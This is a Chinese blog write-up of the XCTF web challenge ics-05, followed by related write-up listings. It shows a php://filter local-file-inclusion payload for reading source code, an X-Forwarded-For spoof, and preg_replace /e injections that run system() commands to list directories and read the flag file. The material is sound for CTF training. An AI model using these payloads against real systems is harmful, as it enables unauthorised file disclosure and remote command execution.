攻防世界web ics-05 writeup

最新推荐文章于 2021-11-07 20:14:51 发布
最新推荐文章于 2021-11-07 20:14:51 发布
阅读量212 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45837896/article/details/107881491
版权

考点:
文件包含 PHP伪协议
preg_replace函数/e模式下,函数将把replace中php代码直接执行

如题:
在这里插入图片描述
又是熟悉的管理系统,这次是设备维护中心出了差错
在这里插入图片描述
要注意刚点进去是什么都没有的,但是经过一番摸索点击左上角的云平台设备维护中心会出现一个新页面
在这里插入图片描述
在这里插入图片描述
虽然长得样子差不多但是url后多了一个page参数
更改参数发现显示的字样会根据url的修改而更改,起初以为是xss攻击,但是看了前辈的博客发现是文件包含漏洞,附上LFI漏洞判断

LFI漏洞的黑盒判断方法:
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。

用到文件包含,根据index字样判断index.php中有后门

构造url

 http://220.249.52.133:42668/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

(这里是把页面源码进行base64加密输出,否则代码将会直接执行而不显示)
在这里插入图片描述将加密后的代码进行base64解密获取页面源代码

在这里插入图片描述阅读源码之后发现前一部分和f12看到的差不多,但是后面多出来一段
在这里插入图片描述阅读后我们发现要检查http头中的XFF是否为127.0.0.1
如果是的话就从url里获取三个参数,并进行preg_replace替换
利用这一特性我们用bp抓包改包

(ps:%26是&的url编码,在url中不能使用空格,应当使用+代替空格,编码时+自动转为空格)
在这里插入图片描述
查看网站文件目录

?pat=/test/e&rep=system("ls")&sub=test

发现s3chahahaDir目录
cd进该目录查看文件

 ?pat=/test/e&rep=system("cd+s3chahahaDir+%26%26+ls")&sub=test

在这里插入图片描述

发现有个flag路径

 ?pat=/test/e&rep=system("cd+s3chahahaDir/flag+%26%26+ls")&sub=test

在这里插入图片描述
发现有flag.php
用cat命令输出flag.php文件的内容

 ?pat=/test/e&rep=system("cat+s3chahahaDir/flag/flag.php+%26%26+ls")&sub=test

在这里插入图片描述

Sprint#51264
关注
专栏目录
攻防世界XCTF—web入门题知识点、进阶提高题Writeup
AugenStern的博客
08-21 875
WriteUpXCTF-Web新手入门区view_sourceget_postrobotsbackupcookiedisabled buttonsimple jsxff refererweak authwebshellcommand executionsimple_php高手进阶区 XCTF-Web 2016 年全国大学生信息安全竞赛开始设立创新实践技能赛,采取的就是传统的 CTF 赛制。在《2016年全国大学生信息安全竞赛参赛指南》中主办方给出的竞赛内容相对全面,值得参考。 系统安全。 涉及操作系统和
攻防世界 web高手进阶区 8分题 ics-02
闵行小鱼塘
10-04 608
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是ics-02的writeup
xctf ics-05 wp
doudoudedi
06-18 2731
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
攻防世界-web-backup-Writeup
baola的博客
06-16 425
攻防世界-web-backup 源码泄露由于网站开发人员忘记删除备份文件,直接上线项目,这对网站来说具有很大的安全隐患,攻击者可以通过下载泄露的源码备份文件,查看源码,从而进行信息收集。
攻防世界web Web_php_include writeup
qq_45837896的博客
07-18 162
看题目所给,页面会把所有传入页面url的php://给替换掉 查询php://得知应该是php伪协议的知识点 从官网得知data://伪协议从而不使用php:// 用法:data://text/plain;base64, 也就是说页面会执行后面的base64代码 ...
XCTF攻防世界-Web-WriteUp
weixin_38912654的博客
12-17 879
目录 view_source get_post robots backup cookie disabled_button simple_js (本篇博客作为自己的学习记录,含有部分前辈大佬的码字,但是在操作上有更新之处,并且步骤较为详细,工具简单,介绍更为具体,特此记录以备回顾之需,也供其他学者借鉴,互相交流学习。) view_source 题目描述:X老师让小宁同学查看一个网...
攻防世界 web高手进阶区 4分题(fakebook、ics-04、ics-05、FlatScience)
闵行小鱼塘
07-16 593
继续ctf的旅程,攻防世界web高手进阶区的4分题:fakebook、ics-04、ics-05、FlatScience
xctf ics-02
weixin_51861515的博客
11-07 282
访问网址,打开文档中心,查看源代码。 发现 secure/default.php(没啥用) 和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。(浏览器的自解码机制,a标签的href属性会进行URL解码)。 打开看一下 没啥有用的信息。 可以用的信息太少了,dirsearch扫一下。 访问secret/ secret.php是一个注册页面,secret_deb...
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界Web赛题记录
Bit0
10-13 2639
Cat 题目:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4658&page=2 Writeup: 攻防世界-web-Cat(XCTF 4th-WHCTF-2017)_Sea_Sand息禅-CSDN博客 攻防世界 | CAT - laolao - 博客园 [CTF题目总结-web篇]攻防世界:Cat_T2hunz1-CSDN博客 知识点: 1.输入字符 get传递在网址
攻防世界部分web题:Writeup
Sy0ung_的博客
05-21 281
打开网址,发现flag按钮不能点,想到和html按钮可能有关 按F12看源码, 把disabled删掉,flag按钮自动点亮,点击得到flag
攻防世界新手Web&Crypto writeup
极客剑寮
12-27 369
viewsource 直接f12,或者chrome在url前加view-source: getpost 直接加参数就行了。 POST参数不用工具直接加个form就行了。 robots 查看robots文件会得到一个php的文件,访问获得flag。 backup 下载文件index.php.bak获得flag。 cookie 查看cookie,可以知道存在cookie.p...
攻防世界Web练习区Writeup
weixin_42831646的博客
11-07 3315
一些工具 burpsuite SwitchyOmega:Chrome用的代理插件 view_source flag: cyberpeace{c0bffec917b3e51ebf26546ac2c88e79} Writeup 这个题打开之后右键没有反应,直接F12 robots flag: cyberpeace{829baa53f19972442c21944e8205697f} 首先介绍一下Robots是做什么的 Robots简介 1 什么是robots协议? robots协议也叫robots.txt(统一
XCTF攻防世界WebWriteUp
weixin_30692143的博客
06-27 601
XCTF攻防世界WebWriteUp 0x00 准备 【内容】 在xctf官网注册账号,即可食用。 【目录】 目录 0x01 view-source2 0x02 get post3 0x03 robots4 0x04 backup6 0x05 Cookie7 0x06 disabled button8 0x07 simple js9 0x08 XFF Refe...
攻防世界-web高级进阶-NewsCenter-WriteUp
weixin_46079186的博客
04-12 229
NewsCenter 打开页面,发现有个搜索框,猜测是sql注入 1.输入一个 ’ 页面出错 2. 在 ’ 后面输入 # 页面返回正常 3. 判断字段数 ’ and 1=2 order by 1 # 页面正常,输入 ’ and 1=2 order by 4 # 页面发生错误,说明有3个字段。 4. 判断回显点 'and 1=2 union select 1,2,3# 发现返回了2和3 5. 查看表名 ’ and 1=2 union select 1,table_name,3 from inf
攻防世界 web php include,XCTF攻防世界 Web Writeup (持续更新中)
weixin_27875131的博客
03-09 416
新手练习区view-sourceF12得到flag。get_postHackBar一把梭。robots访问robots.txt发现隐藏文件,进入该文件获得flag。backupindex.php的备份文件应该是index.php.bak,访问一下发现果然是,用记事本打开下载的文件得到flag。cookie看一下请求头发现cookie.php访问cookie.php,在响应头中有flag。disab...
攻防世界(Ctf-Web 新手练习区 Writeup)
weixin_30663391的博客
06-13 379
平台地址:adworld.xctf.org.cn 在打着暑假工赚零花钱之余,我将这些题利用空余时间刷了一遍,感觉内心还是比较满足的! 题目:view_source 这道题没啥好说的,在url的前面加上个 “view-source: ”就看到flag了 flag:cyberpeace{e07dcafaeeb31d...
攻防世界-web-bug-从0到1的解题历程writeup
CTF小白的博客
04-15 2189
题目分析 拿到题目首先注册了一下admin账号发现账号存在。然后后登陆后发现Manage需要admin权限,那么大概就是要获取到admin账号或者admin权限了。 尝试了一下发现 先输入自己注册的正确账号令其跳转到修改密码界面,然后修改username直接找回admin的密码即可 成功登陆admin账号 发现进入admin模块提示IP NOT allowed。 尝试修改IP添加请求头X-...
【WP】攻防世界新手Web&Crypto writeup
极客剑寮
12-27 265
viewsource 直接f12,或者chrome在url前加view-source: getpost 直接加参数就行了。 POST参数不用工具直接加个form就行了。 robots 查看robots文件会得到一个php的文件,访问获得flag。 backup 下载文件index.php.bak获得flag。 cookie 查看cookie,可以知道存在cookie.p...
攻防世界shuffle
最新发布
09-03
- *3* [攻防世界Reverse进阶区-Shuffle-writeup](https://blog.csdn.net/qq_35056292/article/details/108676766)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值